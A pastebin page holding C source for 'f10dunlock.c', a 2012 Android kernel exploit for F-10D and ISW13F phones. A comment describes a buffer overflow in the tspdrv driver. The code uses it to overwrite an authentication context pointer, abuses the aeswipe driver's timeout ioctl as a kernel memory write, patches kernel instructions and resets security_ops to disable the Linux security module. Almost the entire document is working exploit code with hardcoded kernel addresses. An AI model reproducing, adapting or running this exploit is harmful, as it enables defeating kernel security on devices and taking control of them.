Don't like ads? PRO users don't see any ads ;-)
Public Pastes

f10dunlock.c

By: goroh_kun on Aug 18th, 2012  |  syntax: C  |  size: 8.38 KB  |  hits: 2,061  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. /*
  2.  *  Copyright (c) 2012 goroh_kun
  3.  *
  4.  *  2012/08/31
  5.  *  goroh.kun@gmail.com
  6.  */
  7.  
  8. #include <stdio.h>
  9. #include <stdint.h>
  10. #include <stdlib.h>
  11. #include <unistd.h>
  12. #include <fcntl.h>
  13. #include <errno.h>
  14. #include <sys/stat.h>
  15. #include <sys/mman.h>
  16. #include <sys/ioctl.h>
  17.  
  18. void memdump(char* addr, int num)
  19. {
  20.     int i, j;
  21.     int n = (num + 15) / 16;
  22.     for (j=0; j<n; j++){
  23.         printf("%08x : ", addr);
  24.         for(i=0; i<16; i++){
  25.             printf("%02x ", *addr++);
  26.         }
  27.         addr -= 16;
  28.         for(i=0; i<16; i++){
  29.             if (*addr>=0x20 && *addr<0x80) {
  30.                  printf("%c", *addr);
  31.             } else {
  32.                 printf(".");
  33.             }
  34.             addr++;
  35.         }
  36.         printf("\n");
  37.     }
  38. }
  39.  
  40. #if 0
  41. ########################################################################################
  42. There is vulnerability in function "write" in kernel/drivers/tspdrv/tspdrv.c.
  43.  
  44. static ssize_t write(struct file *file, const char *buf, size_t count, loff_t *ppos)
  45. {
  46. ....
  47.     /* Copy immediately the input buffer */
  48.     if (0 != copy_from_user(g_cWriteBuffer, buf, count))
  49.     {
  50.         /* Failed to copy all the data, exit */
  51.         DbgOut((KERN_ERR "tspdrv: copy_from_user failed.\n"));
  52.         return 0;
  53.     }
  54.  
  55.     /* Check buffer size */
  56.     if ((count <= SPI_HEADER_SIZE) || (count > SPI_BUFFER_SIZE))
  57.     {
  58.         DbgOut((KERN_ERR "tspdrv: invalid write buffer size.\n"));
  59.         return 0;
  60.     }
  61. ....
  62. }
  63.  
  64.  
  65.   We have to check the parameter "count" *before* using copy_from_user.
  66.   Or if we set the parameter larger than g_cWriteBuffer size, it occurs memory overflow.
  67.   In this case, I override a variable named g_lptsAuthContext by using this vulnerability.
  68.   The variable is located like bellow.
  69.  
  70. g_cWriteBuffer    : 0xc09ae698
  71. g_CalibrateBuffer : 0xc09ae6d0
  72. g_lptsAuthContext : 0xc09ae6ec
  73.  
  74. ########################################################################################
  75. #endif
  76.  
  77. #define BUF_SIZE  (0xc09ae6f0 - 0xc09ae698)
  78. #define TSPDRV_MAGIC_NUMBER                 0x494D4D52
  79. void set_lptsAuthContext(unsigned int addr)
  80. {
  81.   char buf[BUF_SIZE] = {0};
  82.   buf[BUF_SIZE - 4] = addr & 0xff;
  83.   buf[BUF_SIZE - 3] = (addr >> 8) & 0xff;
  84.   buf[BUF_SIZE - 2] = (addr >> 16) & 0xff;
  85.   buf[BUF_SIZE - 1] = (addr >> 24) & 0xff;
  86.   int fdtsp = open("/dev/tspdrv", O_RDWR);
  87.   int ret = ioctl(fdtsp, TSPDRV_MAGIC_NUMBER, 0);
  88.   ret = write(fdtsp, buf, BUF_SIZE);
  89.   close(fdtsp);
  90. }
  91.  
  92. /*
  93. ...
  94. 100001a0 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ................
  95. 100001b0 : -- -- -- -- -- -- -- -- 00 00 00 00 aa aa aa aa ................
  96. 100001c0 : -- -- -- -- -- -- -- -- -- -- -- -- 01 00 00 00 ................
  97. ...
  98. 10000250 :*xx xx xx xx -- -- -- -- -- -- -- -- -- -- -- -- ................
  99. ...
  100. * pid is stored on xx xx xx xx, when /dev/aeswipe is opened.
  101. * an ioctl AUTH_IOCTL_SET_TIMEOUT value is stored on aa aa aa aa.
  102. */
  103.  
  104. typedef unsigned int uint32;
  105. typedef int int32;
  106. typedef struct _tag_TrIoctlHeader
  107. {
  108.     uint32 uiSize;          /* INOUT: Total size of the structure including header.         */
  109.                             /*        On input it contains the size of the input buffer.    */
  110.                             /*        On output it contains the size of the output buffer.  */
  111.  
  112.     uint32 uiOperationId;   /*    IN: ID of the desired operation. Needed for TransportIOCL */
  113.                             /*        or on systems where everything is tunneled through a  */
  114.                             /*        single IOCTL. See TrOperationId.                      */
  115.  
  116.     int32  retCode;         /*   OUT: Return code of the IOCTL.                             */
  117. } tsTrIoctlHeader;
  118.  
  119. typedef struct _tag_TrTimeoutIoctlBuffer
  120. {
  121.     tsTrIoctlHeader sHeader;   /* INOUT: Header.         */
  122.     uint32          uiTimeout; /*    IN: Timeout value.  */
  123. } tsTrTimeoutIoctlBuffer;
  124. #define AUTH_IOCTL_BASE ('x')
  125. #define AUTH_IOCTL_SET_TIMEOUT          _IOWR( AUTH_IOCTL_BASE, 10, tsTrTimeoutIoctlBuffer )
  126.  
  127. void mempatch0(unsigned addr)
  128. {
  129.   char buf[0x300] = {0};
  130.   set_lptsAuthContext((unsigned)buf);
  131.   int fdaes = open("/dev/aeswipe", O_RDWR);
  132.   set_lptsAuthContext(addr - 0x1b8);
  133.   close(fdaes);
  134.   set_lptsAuthContext(0);
  135. }
  136.  
  137. void mempatch(int fd, unsigned addr, unsigned value)
  138. {
  139.   tsTrTimeoutIoctlBuffer param = {0};
  140.   param.sHeader.uiSize = sizeof(param);
  141.   param.uiTimeout = value;
  142.  
  143.   set_lptsAuthContext(addr - 0x1bc);
  144.   ioctl(fd, AUTH_IOCTL_SET_TIMEOUT, &param);
  145.   usleep(10000);
  146.   set_lptsAuthContext(0);
  147. }
  148.  
  149. static const unsigned original_code[] = {
  150.   0xe24cb004, // SUB             R11, R12, #4
  151.   0xe1a06001, // MOV             R6, R1
  152. };
  153.  
  154. static const unsigned patched_code[] = {
  155.   0xe5900084, // LDR             R0, [R0,#private] ; file->private
  156.   0xe89da8f0, // LDMFD           SP, {R4-R7,R11,SP,PC}
  157. };
  158.  
  159. static int is_isw13f = 0;
  160. static int is_newf10d = 0;
  161. unsigned int get_private(int fd, int fd2, unsigned aesbuf)
  162. {
  163.   char buf[0x10] = {0};
  164.   unsigned int ret = 0;
  165.  
  166.   if(is_isw13f){
  167.     mempatch(fd2, 0xc043f9e8, patched_code[0]); // module_entry_write+0x8
  168.     mempatch(fd2, 0xc043f9ec, patched_code[1]); // module_entry_write+0xc
  169.   }else{
  170.     if(is_newf10d){
  171.       mempatch(fd2, 0xc044d238, patched_code[0]); // module_entry_write+0x8
  172.       mempatch(fd2, 0xc044d23c, patched_code[1]); // module_entry_write+0xc
  173.     }else{
  174.       mempatch(fd2, 0xc044d20c, patched_code[0]); // module_entry_write+0x8
  175.       mempatch(fd2, 0xc044d210, patched_code[1]); // module_entry_write+0xc
  176.     }
  177.   }
  178.  
  179.   set_lptsAuthContext((unsigned)aesbuf);
  180.   ret = write(fd, buf, 1);
  181.   usleep(10000);
  182.  
  183.   if(is_isw13f){
  184.     mempatch(fd2, 0xc043f9e8, original_code[0]); // module_entry_write+0x8
  185.     mempatch(fd2, 0xc043f9ec, original_code[1]); // module_entry_write+0xc
  186.   }else{
  187.     if(is_newf10d){
  188.       mempatch(fd2, 0xc044d238, original_code[0]); // module_entry_write+0x8
  189.       mempatch(fd2, 0xc044d23c, original_code[1]); // module_entry_write+0xc
  190.     }else{
  191.       mempatch(fd2, 0xc044d20c, original_code[0]); // module_entry_write+0x8
  192.       mempatch(fd2, 0xc044d210, original_code[1]); // module_entry_write+0xc
  193.     }
  194.   }
  195.   return ret;
  196. }
  197.  
  198. int main(int argc, char** argv)
  199. {
  200.   char buf[0x300] = {0};
  201.   int recovery_context = 1;
  202.   unsigned int context_addr = 0;
  203.   if(argc >= 2 && atoi(argv[1])==1){
  204.     printf("use ISW13F address\n");
  205.     is_isw13f = 1;
  206.   }
  207.   if(argc >= 2 && atoi(argv[1])==2){
  208.     printf("use new F-10D address\n");
  209.     is_newf10d = 1;
  210.   }
  211.  
  212.   int fdaes = open("/dev/aeswipe", O_RDWR);
  213.   printf("fdaes = %d\n", fdaes);
  214.   if(fdaes < 0){
  215.     printf("open aeswipe error, so try to disable LSM without recovery g_lptsAuthContext\n");
  216.     recovery_context = 0;
  217.   }
  218.  
  219.   set_lptsAuthContext((unsigned)buf);
  220.   int fdaes2 = open("/dev/aeswipe", O_RDWR);
  221.   set_lptsAuthContext(0);
  222.   printf("fdaes2 = %d\n", fdaes2);
  223.  
  224.   //AuthTransportIOControl disable AbortCheck
  225.   if(is_isw13f){
  226.     mempatch0(0xc043e2fc); // 0xc043e2fc, 0xc043e310 = 0
  227.     mempatch0(0xc043e300); // 0xc043e300, 0xc043e314 = 0
  228.     mempatch0(0xc043e304); // 0xc043e304, 0xc043e318 = 0
  229.     mempatch0(0xc043e308); // 0xc043e308, 0xc043e31c = 0
  230.     mempatch0(0xc043e30c); // 0xc043e30c, 0xc043e320 = 0
  231.   }else{
  232.     if(is_newf10d){
  233.       mempatch0(0xc044bb4c); // 0xc044bb4c, 0xc044bb60 = 0
  234.       mempatch0(0xc044bb50); // 0xc044bb50, 0xc044bb64 = 0
  235.       mempatch0(0xc044bb54); // 0xc044bb54, 0xc044bb68 = 0
  236.       mempatch0(0xc044bb58); // 0xc044bb58, 0xc044bb6c = 0
  237.       mempatch0(0xc044bb5c); // 0xc044bb5c, 0xc044bb70 = 0
  238.     }else{
  239.       mempatch0(0xc044bb14); // 0xc044bb14, 0xc044bb28 = 0
  240.       mempatch0(0xc044bb18); // 0xc044bb18, 0xc044bb2c = 0
  241.       mempatch0(0xc044bb1c); // 0xc044bb1c, 0xc044bb30 = 0
  242.       mempatch0(0xc044bb20); // 0xc044bb20, 0xc044bb34 = 0
  243.       mempatch0(0xc044bb24); // 0xc044bb24, 0xc044bb38 = 0
  244.     }
  245.   }
  246.  
  247.   if(recovery_context){
  248.     context_addr = get_private(fdaes, fdaes2, (unsigned)buf);
  249.     printf("file->private = %08x\n", context_addr);
  250.     if(context_addr >= 0xffff0000) context_addr = 0;
  251.     if(context_addr <= 0xc0000000) context_addr = 0;
  252.   }
  253.  
  254.   if(is_isw13f){
  255.     mempatch(fdaes2, 0xc09e5290, 0xc09308ec); // security_ops = default_security_ops
  256.   }else{
  257.     mempatch(fdaes2, 0xc098ed48, 0xc08da184); // security_ops = default_security_ops
  258.   }
  259.  
  260.   set_lptsAuthContext((unsigned)buf);
  261.   close(fdaes2);
  262.  
  263.   set_lptsAuthContext(context_addr);
  264.   close(fdaes);
  265.   return 0;
  266. }
create a new version of this paste RAW Paste Data